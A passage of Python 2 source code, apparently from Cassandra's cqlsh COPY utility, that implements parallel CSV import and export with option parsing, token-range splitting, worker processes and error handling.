self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = ConfigParser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v.decode('string_escape') if k not in ['errfile', 'ratefile'] else v)
for k, v, in opts.iteritems()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = opts.pop('quote', '"')
dialect_options['escapechar'] = opts.pop('escape', '\\')
dialect_options['delimiter'] = opts.pop('delimiter', ',')
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = opts.pop('null', '')
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [s.strip() for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
# set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
# responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
# set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machine more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On Windows this dictionary must be pickle-able, therefore we do not pass the
parent connection since it may not be pickle-able. Also, on Windows child
processes are spawned and not forked, and therefore we don't need to shutdown
the parent connection anyway, see CASSANDRA-11749 for more details.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
parent_cluster=shell.conn if not IS_WINDOWS else None,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = long(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow(self.columns)
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the out and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'wb'), close=True)
self.num_files += 1
return ret
except IOError, e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate(filter(None, data.split(os.linesep))):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = long(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = long(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = u"[" + u", ".join(self.columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in xrange(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if ret[1] < begin_token:
return None
elif ret[0] < begin_token:
ret = (begin_token, ret[1])
if end_token:
if ret[0] > end_token:
return None
elif ret[1] > end_token:
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = shell.get_ring(self.ks).items()
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this cases we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, ranges.keys())
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'rb')
except IOError, e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = self.sources.next()
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
self.current_source.next()
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
try:
row = self.current_source.next()
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return filter(None, rows)
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
self.insert_errors += len(err.rows)
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
columns = u"[" + u", ".join(self.valid_columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options,
self.shell.conn if not IS_WINDOWS else None)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
shell.printerr(unicode(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in case of file the child process would close it). This is a very primitive support
for STDIN import in that we we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print
def import_records(self):
"""
Keep on running until we have stuff to receive or send and until all processes are running.
Send data (batches or retries) up to the max ingest rate. If we are waiting for stuff to
receive check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
child_timeout = self.options.copy['childtimeout']
last_recv_num_records = 0
last_recv_time = time.time()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.feeding_result is not None:
if self.receive_meter.total_records != last_recv_num_records:
last_recv_num_records = self.receive_meter.total_records
last_recv_time = time.time()
elif (time.time() - last_recv_time) > child_timeout:
self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
break
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records(),
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options, parent_cluster):
mp.Process.__init__(self, target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
self.parent_cluster = parent_cluster
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = filter(lambda c: c.num_pending() < max_pending_chunks, channels)
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
An child worker process, this is for common functionality between ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
mp.Process.__init__(self, target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.parent_cluster = params['parent_cluster']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
